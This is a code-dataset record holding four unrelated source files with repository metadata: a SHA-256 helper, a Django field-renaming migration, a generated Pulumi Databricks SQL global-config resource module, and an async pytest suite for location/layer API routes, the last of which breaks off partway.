blob/hashers.py
|
artgromov/blob_storage
|
8d3946eb624041da8f8512a5e9afc47c59a80b27
|
[
"MIT"
] | null | null | null |
blob/hashers.py
|
artgromov/blob_storage
|
8d3946eb624041da8f8512a5e9afc47c59a80b27
|
[
"MIT"
] | null | null | null |
import hashlib
def sha256(data: bytes) -> str:
    """Return the hex-encoded SHA-256 digest of *data*."""
    digest = hashlib.sha256(data)
    return digest.hexdigest()
| 14.333333
| 43
| 0.732558
| 11
| 86
| 5.727273
| 0.727273
| 0.31746
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.082192
| 0.151163
| 86
| 5
| 44
| 17.2
| 0.780822
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
c605cc489a32643bc2a1e9bd1ed66ca8feb412a7
| 2,138
|
py
|
Python
|
brambling/migrations/0041_auto_20160104_2321.py
|
Shivanjain023/django-brambling
|
17539b82df37f22bd2b4293e73142b887c916344
|
[
"BSD-3-Clause"
] | 8
|
2015-05-06T18:26:15.000Z
|
2018-02-07T22:18:32.000Z
|
brambling/migrations/0041_auto_20160104_2321.py
|
Shivanjain023/django-brambling
|
17539b82df37f22bd2b4293e73142b887c916344
|
[
"BSD-3-Clause"
] | 578
|
2015-01-05T21:37:17.000Z
|
2018-02-14T16:43:50.000Z
|
brambling/migrations/0041_auto_20160104_2321.py
|
Shivanjain023/django-brambling
|
17539b82df37f22bd2b4293e73142b887c916344
|
[
"BSD-3-Clause"
] | 1
|
2015-08-20T16:59:32.000Z
|
2015-08-20T16:59:32.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    # Auto-generated schema migration: renames given_name/surname to
    # first_name/last_name on the attendee, person, and savedattendee models,
    # and re-labels the name_order choices to match the new terminology.
    # Generated by `makemigrations` -- keep the canonical structure intact.

    dependencies = [
        ('brambling', '0040_auto_20151223_0821'),
    ]

    operations = [
        # given_name -> first_name and surname -> last_name, per model.
        migrations.RenameField(
            model_name='attendee',
            old_name='given_name',
            new_name='first_name',
        ),
        migrations.RenameField(
            model_name='attendee',
            old_name='surname',
            new_name='last_name',
        ),
        migrations.RenameField(
            model_name='person',
            old_name='given_name',
            new_name='first_name',
        ),
        migrations.RenameField(
            model_name='person',
            old_name='surname',
            new_name='last_name',
        ),
        migrations.RenameField(
            model_name='savedattendee',
            old_name='given_name',
            new_name='first_name',
        ),
        migrations.RenameField(
            model_name='savedattendee',
            old_name='surname',
            new_name='last_name',
        ),
        # Same name_order field definition on all three models; only the
        # human-readable choice labels change (e.g. 'Given' -> 'First').
        migrations.AlterField(
            model_name='attendee',
            name='name_order',
            field=models.CharField(default='GMS', max_length=3, choices=[('GMS', 'First Middle Surname'), ('SGM', 'Surname First Middle'), ('GS', 'First Surname'), ('SG', 'Surname First')]),
            preserve_default=True,
        ),
        migrations.AlterField(
            model_name='person',
            name='name_order',
            field=models.CharField(default='GMS', max_length=3, choices=[('GMS', 'First Middle Surname'), ('SGM', 'Surname First Middle'), ('GS', 'First Surname'), ('SG', 'Surname First')]),
            preserve_default=True,
        ),
        migrations.AlterField(
            model_name='savedattendee',
            name='name_order',
            field=models.CharField(default='GMS', max_length=3, choices=[('GMS', 'First Middle Surname'), ('SGM', 'Surname First Middle'), ('GS', 'First Surname'), ('SG', 'Surname First')]),
            preserve_default=True,
        ),
    ]
| 33.936508
| 190
| 0.553789
| 202
| 2,138
| 5.628713
| 0.242574
| 0.07124
| 0.137203
| 0.158311
| 0.819701
| 0.819701
| 0.819701
| 0.779244
| 0.711522
| 0.711522
| 0
| 0.013459
| 0.304958
| 2,138
| 62
| 191
| 34.483871
| 0.751682
| 0.009822
| 0
| 0.857143
| 0
| 0
| 0.230733
| 0.010875
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.035714
| 0
| 0.089286
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c64efa14652aa58df8fd24946d8d088bd0f32ef6
| 25,255
|
py
|
Python
|
sdk/python/pulumi_databricks/sql_global_config.py
|
pulumi/pulumi-databricks
|
43580d4adbd04b72558f368ff0eef3d03432ebc1
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_databricks/sql_global_config.py
|
pulumi/pulumi-databricks
|
43580d4adbd04b72558f368ff0eef3d03432ebc1
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_databricks/sql_global_config.py
|
pulumi/pulumi-databricks
|
43580d4adbd04b72558f368ff0eef3d03432ebc1
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
# Public API of this generated module: the resource class and its args type.
__all__ = ['SqlGlobalConfigArgs', 'SqlGlobalConfig']
@pulumi.input_type
class SqlGlobalConfigArgs:
    # NOTE(review): generated by the Pulumi Terraform Bridge (tfgen); do not
    # hand-edit the code -- comments only. Input-argument container for the
    # SqlGlobalConfig resource: every field is an optional pulumi Input, and
    # each has a snake_case Python property mapped to the camelCase wire name
    # via @pulumi.getter(name=...).
    def __init__(__self__, *,
                 data_access_config: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                 enable_serverless_compute: Optional[pulumi.Input[bool]] = None,
                 instance_profile_arn: Optional[pulumi.Input[str]] = None,
                 security_policy: Optional[pulumi.Input[str]] = None,
                 sql_config_params: Optional[pulumi.Input[Mapping[str, Any]]] = None):
        """
        The set of arguments for constructing a SqlGlobalConfig resource.
        :param pulumi.Input[Mapping[str, Any]] data_access_config: - data access configuration for databricks_sql_endpoint, such as configuration for an external Hive metastore, Hadoop Filesystem configuration, etc. Please note that the list of supported configuration properties is limited, so refer to the [documentation](https://docs.databricks.com/sql/admin/data-access-configuration.html#supported-properties) for a full list. Apply will fail if you're specifying not permitted configuration.
        :param pulumi.Input[str] instance_profile_arn: - InstanceProfile used to access storage from databricks_sql_endpoint. Please note that this parameter is only for AWS, and will generate an error if used on other clouds.
        :param pulumi.Input[str] security_policy: - The policy for controlling access to datasets. Default value: `DATA_ACCESS_CONTROL`, consult documentation for list of possible values
        :param pulumi.Input[Mapping[str, Any]] sql_config_params: - SQL Configuration Parameters let you override the default behavior for all sessions with all endpoints.
        """
        # Only explicitly-provided values are stored, so unset fields remain
        # absent from the input bag rather than being sent as None.
        if data_access_config is not None:
            pulumi.set(__self__, "data_access_config", data_access_config)
        if enable_serverless_compute is not None:
            pulumi.set(__self__, "enable_serverless_compute", enable_serverless_compute)
        if instance_profile_arn is not None:
            pulumi.set(__self__, "instance_profile_arn", instance_profile_arn)
        if security_policy is not None:
            pulumi.set(__self__, "security_policy", security_policy)
        if sql_config_params is not None:
            pulumi.set(__self__, "sql_config_params", sql_config_params)

    @property
    @pulumi.getter(name="dataAccessConfig")
    def data_access_config(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
        """
        - data access configuration for databricks_sql_endpoint, such as configuration for an external Hive metastore, Hadoop Filesystem configuration, etc. Please note that the list of supported configuration properties is limited, so refer to the [documentation](https://docs.databricks.com/sql/admin/data-access-configuration.html#supported-properties) for a full list. Apply will fail if you're specifying not permitted configuration.
        """
        return pulumi.get(self, "data_access_config")

    @data_access_config.setter
    def data_access_config(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
        pulumi.set(self, "data_access_config", value)

    @property
    @pulumi.getter(name="enableServerlessCompute")
    def enable_serverless_compute(self) -> Optional[pulumi.Input[bool]]:
        return pulumi.get(self, "enable_serverless_compute")

    @enable_serverless_compute.setter
    def enable_serverless_compute(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enable_serverless_compute", value)

    @property
    @pulumi.getter(name="instanceProfileArn")
    def instance_profile_arn(self) -> Optional[pulumi.Input[str]]:
        """
        - InstanceProfile used to access storage from databricks_sql_endpoint. Please note that this parameter is only for AWS, and will generate an error if used on other clouds.
        """
        return pulumi.get(self, "instance_profile_arn")

    @instance_profile_arn.setter
    def instance_profile_arn(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "instance_profile_arn", value)

    @property
    @pulumi.getter(name="securityPolicy")
    def security_policy(self) -> Optional[pulumi.Input[str]]:
        """
        - The policy for controlling access to datasets. Default value: `DATA_ACCESS_CONTROL`, consult documentation for list of possible values
        """
        return pulumi.get(self, "security_policy")

    @security_policy.setter
    def security_policy(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "security_policy", value)

    @property
    @pulumi.getter(name="sqlConfigParams")
    def sql_config_params(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
        """
        - SQL Configuration Parameters let you override the default behavior for all sessions with all endpoints.
        """
        return pulumi.get(self, "sql_config_params")

    @sql_config_params.setter
    def sql_config_params(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
        pulumi.set(self, "sql_config_params", value)
@pulumi.input_type
class _SqlGlobalConfigState:
    # NOTE(review): generated by the Pulumi Terraform Bridge (tfgen); do not
    # hand-edit the code -- comments only. State container mirroring
    # SqlGlobalConfigArgs, used by SqlGlobalConfig.get() for looking up and
    # filtering existing resources.
    def __init__(__self__, *,
                 data_access_config: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                 enable_serverless_compute: Optional[pulumi.Input[bool]] = None,
                 instance_profile_arn: Optional[pulumi.Input[str]] = None,
                 security_policy: Optional[pulumi.Input[str]] = None,
                 sql_config_params: Optional[pulumi.Input[Mapping[str, Any]]] = None):
        """
        Input properties used for looking up and filtering SqlGlobalConfig resources.
        :param pulumi.Input[Mapping[str, Any]] data_access_config: - data access configuration for databricks_sql_endpoint, such as configuration for an external Hive metastore, Hadoop Filesystem configuration, etc. Please note that the list of supported configuration properties is limited, so refer to the [documentation](https://docs.databricks.com/sql/admin/data-access-configuration.html#supported-properties) for a full list. Apply will fail if you're specifying not permitted configuration.
        :param pulumi.Input[str] instance_profile_arn: - InstanceProfile used to access storage from databricks_sql_endpoint. Please note that this parameter is only for AWS, and will generate an error if used on other clouds.
        :param pulumi.Input[str] security_policy: - The policy for controlling access to datasets. Default value: `DATA_ACCESS_CONTROL`, consult documentation for list of possible values
        :param pulumi.Input[Mapping[str, Any]] sql_config_params: - SQL Configuration Parameters let you override the default behavior for all sessions with all endpoints.
        """
        # Only explicitly-provided values are stored, so unset fields remain
        # absent from the state bag rather than being sent as None.
        if data_access_config is not None:
            pulumi.set(__self__, "data_access_config", data_access_config)
        if enable_serverless_compute is not None:
            pulumi.set(__self__, "enable_serverless_compute", enable_serverless_compute)
        if instance_profile_arn is not None:
            pulumi.set(__self__, "instance_profile_arn", instance_profile_arn)
        if security_policy is not None:
            pulumi.set(__self__, "security_policy", security_policy)
        if sql_config_params is not None:
            pulumi.set(__self__, "sql_config_params", sql_config_params)

    @property
    @pulumi.getter(name="dataAccessConfig")
    def data_access_config(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
        """
        - data access configuration for databricks_sql_endpoint, such as configuration for an external Hive metastore, Hadoop Filesystem configuration, etc. Please note that the list of supported configuration properties is limited, so refer to the [documentation](https://docs.databricks.com/sql/admin/data-access-configuration.html#supported-properties) for a full list. Apply will fail if you're specifying not permitted configuration.
        """
        return pulumi.get(self, "data_access_config")

    @data_access_config.setter
    def data_access_config(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
        pulumi.set(self, "data_access_config", value)

    @property
    @pulumi.getter(name="enableServerlessCompute")
    def enable_serverless_compute(self) -> Optional[pulumi.Input[bool]]:
        return pulumi.get(self, "enable_serverless_compute")

    @enable_serverless_compute.setter
    def enable_serverless_compute(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enable_serverless_compute", value)

    @property
    @pulumi.getter(name="instanceProfileArn")
    def instance_profile_arn(self) -> Optional[pulumi.Input[str]]:
        """
        - InstanceProfile used to access storage from databricks_sql_endpoint. Please note that this parameter is only for AWS, and will generate an error if used on other clouds.
        """
        return pulumi.get(self, "instance_profile_arn")

    @instance_profile_arn.setter
    def instance_profile_arn(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "instance_profile_arn", value)

    @property
    @pulumi.getter(name="securityPolicy")
    def security_policy(self) -> Optional[pulumi.Input[str]]:
        """
        - The policy for controlling access to datasets. Default value: `DATA_ACCESS_CONTROL`, consult documentation for list of possible values
        """
        return pulumi.get(self, "security_policy")

    @security_policy.setter
    def security_policy(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "security_policy", value)

    @property
    @pulumi.getter(name="sqlConfigParams")
    def sql_config_params(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
        """
        - SQL Configuration Parameters let you override the default behavior for all sessions with all endpoints.
        """
        return pulumi.get(self, "sql_config_params")

    @sql_config_params.setter
    def sql_config_params(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
        pulumi.set(self, "sql_config_params", value)
class SqlGlobalConfig(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
data_access_config: Optional[pulumi.Input[Mapping[str, Any]]] = None,
enable_serverless_compute: Optional[pulumi.Input[bool]] = None,
instance_profile_arn: Optional[pulumi.Input[str]] = None,
security_policy: Optional[pulumi.Input[str]] = None,
sql_config_params: Optional[pulumi.Input[Mapping[str, Any]]] = None,
__props__=None):
"""
This resource configures the security policy, databricks_instance_profile, and [data access properties](https://docs.databricks.com/sql/admin/data-access-configuration.html) for all SqlEndpoint of workspace. *Please note that changing parameters of this resources will restart all running databricks_sql_endpoint.* To use this resource you need to be an administrator.
## Example Usage
### AWS example
```python
import pulumi
import pulumi_databricks as databricks
this = databricks.SqlGlobalConfig("this",
security_policy="DATA_ACCESS_CONTROL",
instance_profile_arn="arn:....",
data_access_config={
"spark.sql.session.timeZone": "UTC",
})
```
### Azure example
For Azure you should use the `data_access_config` to provide the service principal configuration. You can use the Databricks SQL Admin Console UI to help you generate the right configuration values.
```python
import pulumi
import pulumi_databricks as databricks
this = databricks.SqlGlobalConfig("this",
security_policy="DATA_ACCESS_CONTROL",
data_access_config={
"spark.hadoop.fs.azure.account.auth.type": "OAuth",
"spark.hadoop.fs.azure.account.oauth.provider.type": "org.apache.hadoop.fs.azurebfs.oauth2.ClientCredsTokenProvider",
"spark.hadoop.fs.azure.account.oauth2.client.id": var["tenant_id"],
"spark.hadoop.fs.azure.account.oauth2.client.secret": f"{{{{secrets/{local['secret_scope']}/{local['secret_key']}}}}}",
"spark.hadoop.fs.azure.account.oauth2.client.endpoint": f"https://login.microsoftonline.com/{var['tenant_id']}/oauth2/token",
},
sql_config_params={
"ANSI_MODE": "true",
})
```
## Related Resources
The following resources are often used in the same context:
* End to end workspace management guide.
* InstanceProfile to manage AWS EC2 instance profiles that users can launch Cluster and access data, like databricks_mount.
* SqlDashboard to manage Databricks SQL [Dashboards](https://docs.databricks.com/sql/user/dashboards/index.html).
* SqlEndpoint to manage Databricks SQL [Endpoints](https://docs.databricks.com/sql/admin/sql-endpoints.html).
* SqlPermissions to manage data object access control lists in Databricks workspaces for things like tables, views, databases, and [more](https://docs.databricks.com/security/access-control/table-acls/object-privileges.html).
## Import
You can import a `databricks_sql_global_config` resource with command like the following (you need to use `global` as ID)bash
```sh
$ pulumi import databricks:index/sqlGlobalConfig:SqlGlobalConfig this global
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Mapping[str, Any]] data_access_config: - data access configuration for databricks_sql_endpoint, such as configuration for an external Hive metastore, Hadoop Filesystem configuration, etc. Please note that the list of supported configuration properties is limited, so refer to the [documentation](https://docs.databricks.com/sql/admin/data-access-configuration.html#supported-properties) for a full list. Apply will fail if you're specifying not permitted configuration.
:param pulumi.Input[str] instance_profile_arn: - InstanceProfile used to access storage from databricks_sql_endpoint. Please note that this parameter is only for AWS, and will generate an error if used on other clouds.
:param pulumi.Input[str] security_policy: - The policy for controlling access to datasets. Default value: `DATA_ACCESS_CONTROL`, consult documentation for list of possible values
:param pulumi.Input[Mapping[str, Any]] sql_config_params: - SQL Configuration Parameters let you override the default behavior for all sessions with all endpoints.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: Optional[SqlGlobalConfigArgs] = None,
opts: Optional[pulumi.ResourceOptions] = None):
"""
This resource configures the security policy, databricks_instance_profile, and [data access properties](https://docs.databricks.com/sql/admin/data-access-configuration.html) for all SqlEndpoint of workspace. *Please note that changing parameters of this resources will restart all running databricks_sql_endpoint.* To use this resource you need to be an administrator.
## Example Usage
### AWS example
```python
import pulumi
import pulumi_databricks as databricks
this = databricks.SqlGlobalConfig("this",
security_policy="DATA_ACCESS_CONTROL",
instance_profile_arn="arn:....",
data_access_config={
"spark.sql.session.timeZone": "UTC",
})
```
### Azure example
For Azure you should use the `data_access_config` to provide the service principal configuration. You can use the Databricks SQL Admin Console UI to help you generate the right configuration values.
```python
import pulumi
import pulumi_databricks as databricks
this = databricks.SqlGlobalConfig("this",
security_policy="DATA_ACCESS_CONTROL",
data_access_config={
"spark.hadoop.fs.azure.account.auth.type": "OAuth",
"spark.hadoop.fs.azure.account.oauth.provider.type": "org.apache.hadoop.fs.azurebfs.oauth2.ClientCredsTokenProvider",
"spark.hadoop.fs.azure.account.oauth2.client.id": var["tenant_id"],
"spark.hadoop.fs.azure.account.oauth2.client.secret": f"{{{{secrets/{local['secret_scope']}/{local['secret_key']}}}}}",
"spark.hadoop.fs.azure.account.oauth2.client.endpoint": f"https://login.microsoftonline.com/{var['tenant_id']}/oauth2/token",
},
sql_config_params={
"ANSI_MODE": "true",
})
```
## Related Resources
The following resources are often used in the same context:
* End to end workspace management guide.
* InstanceProfile to manage AWS EC2 instance profiles that users can launch Cluster and access data, like databricks_mount.
* SqlDashboard to manage Databricks SQL [Dashboards](https://docs.databricks.com/sql/user/dashboards/index.html).
* SqlEndpoint to manage Databricks SQL [Endpoints](https://docs.databricks.com/sql/admin/sql-endpoints.html).
* SqlPermissions to manage data object access control lists in Databricks workspaces for things like tables, views, databases, and [more](https://docs.databricks.com/security/access-control/table-acls/object-privileges.html).
## Import
You can import a `databricks_sql_global_config` resource with command like the following (you need to use `global` as ID)bash
```sh
$ pulumi import databricks:index/sqlGlobalConfig:SqlGlobalConfig this global
```
:param str resource_name: The name of the resource.
:param SqlGlobalConfigArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(SqlGlobalConfigArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
    def _internal_init(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 data_access_config: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                 enable_serverless_compute: Optional[pulumi.Input[bool]] = None,
                 instance_profile_arn: Optional[pulumi.Input[str]] = None,
                 security_policy: Optional[pulumi.Input[str]] = None,
                 sql_config_params: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                 __props__=None):
        """Shared initializer behind both ``__init__`` overloads.

        Validates/normalizes ``opts``, builds the input property bag for a new
        resource, and registers it with the Pulumi engine via the base-class
        constructor.
        """
        # Normalize options and stamp the provider SDK version onto them.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            # Creating a new resource: __props__ is reserved for the
            # get-existing-resource path (see SqlGlobalConfig.get).
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            # __new__ bypasses SqlGlobalConfigArgs.__init__ on purpose: the
            # property bag is populated field-by-field below.
            __props__ = SqlGlobalConfigArgs.__new__(SqlGlobalConfigArgs)
            __props__.__dict__["data_access_config"] = data_access_config
            __props__.__dict__["enable_serverless_compute"] = enable_serverless_compute
            __props__.__dict__["instance_profile_arn"] = instance_profile_arn
            __props__.__dict__["security_policy"] = security_policy
            __props__.__dict__["sql_config_params"] = sql_config_params
        super(SqlGlobalConfig, __self__).__init__(
            'databricks:index/sqlGlobalConfig:SqlGlobalConfig',
            resource_name,
            __props__,
            opts)
    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            data_access_config: Optional[pulumi.Input[Mapping[str, Any]]] = None,
            enable_serverless_compute: Optional[pulumi.Input[bool]] = None,
            instance_profile_arn: Optional[pulumi.Input[str]] = None,
            security_policy: Optional[pulumi.Input[str]] = None,
            sql_config_params: Optional[pulumi.Input[Mapping[str, Any]]] = None) -> 'SqlGlobalConfig':
        """
        Get an existing SqlGlobalConfig resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[Mapping[str, Any]] data_access_config: - data access configuration for databricks_sql_endpoint, such as configuration for an external Hive metastore, Hadoop Filesystem configuration, etc. Please note that the list of supported configuration properties is limited, so refer to the [documentation](https://docs.databricks.com/sql/admin/data-access-configuration.html#supported-properties) for a full list. Apply will fail if you're specifying not permitted configuration.
        :param pulumi.Input[bool] enable_serverless_compute: - presumably toggles serverless compute for SQL endpoints; no upstream description was generated — confirm against the provider documentation.
        :param pulumi.Input[str] instance_profile_arn: - InstanceProfile used to access storage from databricks_sql_endpoint. Please note that this parameter is only for AWS, and will generate an error if used on other clouds.
        :param pulumi.Input[str] security_policy: - The policy for controlling access to datasets. Default value: `DATA_ACCESS_CONTROL`, consult documentation for list of possible values
        :param pulumi.Input[Mapping[str, Any]] sql_config_params: - SQL Configuration Parameters let you override the default behavior for all sessions with all endpoints.
        """
        # Lookups are keyed by provider ID; merge it into the options.
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
        # __new__ bypasses the state class's __init__; the bag is seeded with
        # whatever qualifiers the caller supplied.
        __props__ = _SqlGlobalConfigState.__new__(_SqlGlobalConfigState)
        __props__.__dict__["data_access_config"] = data_access_config
        __props__.__dict__["enable_serverless_compute"] = enable_serverless_compute
        __props__.__dict__["instance_profile_arn"] = instance_profile_arn
        __props__.__dict__["security_policy"] = security_policy
        __props__.__dict__["sql_config_params"] = sql_config_params
        return SqlGlobalConfig(resource_name, opts=opts, __props__=__props__)
    @property
    @pulumi.getter(name="dataAccessConfig")
    def data_access_config(self) -> pulumi.Output[Optional[Mapping[str, Any]]]:
        """
        - data access configuration for databricks_sql_endpoint, such as configuration for an external Hive metastore, Hadoop Filesystem configuration, etc. Please note that the list of supported configuration properties is limited, so refer to the [documentation](https://docs.databricks.com/sql/admin/data-access-configuration.html#supported-properties) for a full list. Apply will fail if you're specifying not permitted configuration.
        """
        return pulumi.get(self, "data_access_config")

    @property
    @pulumi.getter(name="enableServerlessCompute")
    def enable_serverless_compute(self) -> pulumi.Output[Optional[bool]]:
        """
        - presumably toggles serverless compute for SQL endpoints; no upstream description was generated — confirm against the provider documentation.
        """
        return pulumi.get(self, "enable_serverless_compute")

    @property
    @pulumi.getter(name="instanceProfileArn")
    def instance_profile_arn(self) -> pulumi.Output[Optional[str]]:
        """
        - InstanceProfile used to access storage from databricks_sql_endpoint. Please note that this parameter is only for AWS, and will generate an error if used on other clouds.
        """
        return pulumi.get(self, "instance_profile_arn")

    @property
    @pulumi.getter(name="securityPolicy")
    def security_policy(self) -> pulumi.Output[Optional[str]]:
        """
        - The policy for controlling access to datasets. Default value: `DATA_ACCESS_CONTROL`, consult documentation for list of possible values
        """
        return pulumi.get(self, "security_policy")

    @property
    @pulumi.getter(name="sqlConfigParams")
    def sql_config_params(self) -> pulumi.Output[Optional[Mapping[str, Any]]]:
        """
        - SQL Configuration Parameters let you override the default behavior for all sessions with all endpoints.
        """
        return pulumi.get(self, "sql_config_params")
| 58.869464
| 499
| 0.702594
| 3,045
| 25,255
| 5.617077
| 0.090312
| 0.038587
| 0.049988
| 0.031922
| 0.90166
| 0.892774
| 0.892774
| 0.885816
| 0.880145
| 0.876696
| 0
| 0.000649
| 0.207365
| 25,255
| 428
| 500
| 59.007009
| 0.853782
| 0.511542
| 0
| 0.777228
| 1
| 0
| 0.123498
| 0.030897
| 0
| 0
| 0
| 0
| 0
| 1
| 0.158416
| false
| 0.004951
| 0.024752
| 0.014851
| 0.277228
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d67522406aa24a1076bba2d473fe236567784e7b
| 5,524
|
py
|
Python
|
tests/layer/test_routes.py
|
EasyVizAR/edge-server
|
523d64da5a9579d7c99bede47985a7a09d33f9ec
|
[
"MIT"
] | null | null | null |
tests/layer/test_routes.py
|
EasyVizAR/edge-server
|
523d64da5a9579d7c99bede47985a7a09d33f9ec
|
[
"MIT"
] | null | null | null |
tests/layer/test_routes.py
|
EasyVizAR/edge-server
|
523d64da5a9579d7c99bede47985a7a09d33f9ec
|
[
"MIT"
] | 1
|
2021-09-17T16:13:16.000Z
|
2021-09-17T16:13:16.000Z
|
import os
from http import HTTPStatus
import pytest
from server.main import app
@pytest.mark.asyncio
async def test_layer_routes():
    """
    Exercise the CRUD routes for layers nested under a location.

    Walks the full lifecycle against the app's test client: list (plain and
    enveloped), create via POST, fetch, PATCH, replace via PUT, delete,
    re-create via PUT, and 404 behavior once the resource is gone.
    """
    # Name of a field within the resource which we can change and test.
    test_field = "name"
    async with app.test_client() as client:
        # Create a test location to nest the layers under.
        response = await client.post("/locations", json=dict(name="Test"))
        assert response.status_code == HTTPStatus.CREATED
        assert response.is_json
        location = await response.get_json()

        layers_url = "/locations/{}/layers".format(location['id'])

        # Initial list of layers
        response = await client.get(layers_url)
        assert response.status_code == HTTPStatus.OK
        assert response.is_json
        layers = await response.get_json()
        assert isinstance(layers, list)

        # Initial list of layers with envelope (?envelope=items wraps the
        # list in a dict under the requested key).
        response = await client.get(layers_url + "?envelope=items")
        assert response.status_code == HTTPStatus.OK
        assert response.is_json
        layers2 = await response.get_json()
        assert isinstance(layers2, dict)
        assert isinstance(layers2['items'], list)

        # Create an object
        response = await client.post(layers_url, json={test_field: "foo"})
        assert response.status_code == HTTPStatus.CREATED
        assert response.is_json
        layer = await response.get_json()
        assert isinstance(layer, dict)
        assert layer['id'] is not None
        assert layer[test_field] == "foo"

        layer_url = "{}/{}".format(layers_url, layer['id'])

        # Test getting the object back
        response = await client.get(layer_url)
        assert response.status_code == HTTPStatus.OK
        assert response.is_json
        layer2 = await response.get_json()
        assert layer2['id'] == layer['id']
        assert layer2[test_field] == layer[test_field]

        # Test changing the name; the bogus "id" in the body must be
        # ignored by the server (id is asserted unchanged below).
        response = await client.patch(layer_url, json={"id": "bad", test_field: "bar"})
        assert response.status_code == HTTPStatus.OK
        assert response.is_json
        layer2 = await response.get_json()
        assert layer2['id'] == layer['id']
        assert layer2[test_field] == "bar"

        # Test replacement (PUT of the original object restores the name)
        response = await client.put(layer_url, json=layer)
        assert response.status_code == HTTPStatus.OK
        assert response.is_json
        layer2 = await response.get_json()
        assert layer2['id'] == layer['id']
        assert layer2[test_field] == layer[test_field]

        # Test deleting the object; the deleted resource is echoed back.
        response = await client.delete(layer_url)
        assert response.status_code == HTTPStatus.OK
        assert response.is_json
        layer2 = await response.get_json()
        assert layer2['id'] == layer['id']

        # Test creating object through PUT (upsert on a known URL)
        response = await client.put(layer_url, json=layer)
        assert response.status_code == HTTPStatus.CREATED
        assert response.is_json
        layer2 = await response.get_json()
        assert layer2['id'] == layer['id']
        assert layer2[test_field] == layer[test_field]

        # Test that object does not exist after DELETE: the second delete,
        # a get, and a patch must all report NOT_FOUND.
        response = await client.delete(layer_url)
        assert response.status_code == HTTPStatus.OK
        response = await client.delete(layer_url)
        assert response.status_code == HTTPStatus.NOT_FOUND
        response = await client.get(layer_url)
        assert response.status_code == HTTPStatus.NOT_FOUND
        response = await client.patch(layer_url, json={test_field: "bar"})
        assert response.status_code == HTTPStatus.NOT_FOUND
@pytest.mark.asyncio
async def test_layer_upload():
    """
    Exercise the two-step upload flow for layers of type "uploaded".

    Creating the layer returns an imageUrl; PUTting image data to that URL
    flips the layer's "ready" flag, bumps "updated", and makes the bytes
    retrievable via GET on the same URL.
    """
    async with app.test_client() as client:
        # Create a test location to nest the layer under.
        response = await client.post("/locations", json=dict(name="Test"))
        assert response.status_code == HTTPStatus.CREATED
